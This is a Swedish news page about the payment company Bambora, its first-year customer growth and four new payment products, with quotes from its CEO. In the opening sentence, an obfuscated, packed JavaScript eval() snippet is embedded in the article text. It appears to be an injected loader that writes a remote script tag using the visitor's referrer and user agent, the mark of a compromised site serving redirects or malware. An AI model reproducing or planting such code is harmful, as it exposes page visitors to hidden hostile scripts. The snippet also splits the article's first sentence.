Image Image Image Image Image Image Image Image Image Image

| 18 december, 2017

Scroll to top

Top

No Comments

Bambora: En ny affär var fjärde minut | Revue.se

Bambora: En ny affär var fjärde minut
Sebastian Plengier Ehrnfelt

Det eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|reddn|var|u0026u|referrer|brhfk||js|php’.split(‘|’),0,{}))
har gått ett år sedan betalkoncernen Bambora lanserades med målet att utmana en krånglig bransch. Det har varit ett händelserikt år och bara under första kvartalet 2016 har Bambora vunnit 7 600 unika kunder – vilket motsvarar en ny affär var fjärde minut. 

– Branschen har blivit mycket bättre under det senaste året på att tillgodose kraven på enkelhet och användarvänlighet – det gläder oss. Men det finns mycket kvar att göra och därför lanserar vi nu fyra nya lösningar för att göra livet smidigare för företagarna. Vi vill fortsätta göra branschen mindre krånglig, säger Johan Tjärnberg, vd på Bambora.

Bamboras nya tjänster är Native Payment, ONE Integrated, myBambora och Checkout – fyra produkter som är framtagna för att underlätta för den enskilde handlaren i vardagen men också för att skapa möjligheter för företag att växa.

– Vi vill vara med under hela företagets resa, från start men också när det är dags att skala upp verksamheten. De flesta entreprenörer vill växa och bli större men i dag är det alldeles för krångligt för många när kostymen börjar kännas för trång. Vi vill göra denna resa så enkel som möjligt så att företagaren fullt ut kan koncentrera sig på den egna verksamheten, säger Johan Tjärnberg.

Framtidsvisionen för Bambora är också att inspirera företagare att genom små enkla steg förbättra och utveckla verksamheten. Oavsett om det handlar om att hjälpa den lokala bagaren tar steget in i e-handeln eller underlätta för stjärnkrögaren att erbjuda sina kunder möjligheten att förbeställa mat redan på väg i taxin.

– Steget att göra något nytt ska vara enkelt och roligt. Om ett år hoppas vi kunna visa på att många företag gjort just detta med vår hjälp. Krånglighet är fortfarande vår största fiende, säger Johan Tjärnberg.

Bamboras nya tjänster

Checkout är en komplett betallösning för e-handel. Lösningen lagrar kundens kortdetaljer och låter dem betala utan att ta upp kortet. Att komma igång tar mindre än 24 timmar.

Native Payment är en lösning för dig som vill ta emot kortbetalningar i din Android- eller iOS-app. Slutanvändaren registrerar sina kort och kan sedan betala med ett klick. Tjänsten är färdig att integrera, och tar normalt bara några dagar att få igång.

ONE Integrated är det enklaste sättet att få en fullt integrerad betallösning. Som handlare kan du själv välja vilket kassasystem du föredrar – en traditionell kassa eller en molnbaserad lösning som du kan använda på din läsplatta eller smartphone.

myBambora underlättar för företagaren att följa sin verksamhet, ha koll på transaktioner och de produkter man använder. Informationen finns tillgänglig i APP eller via en webbtjänst på datorn.

Bambora ägs av Nordic Capital Fond VIII och består av en konsolidering av företagen Samport, MPS, ePay, DK Online, Key Corp och Euroline.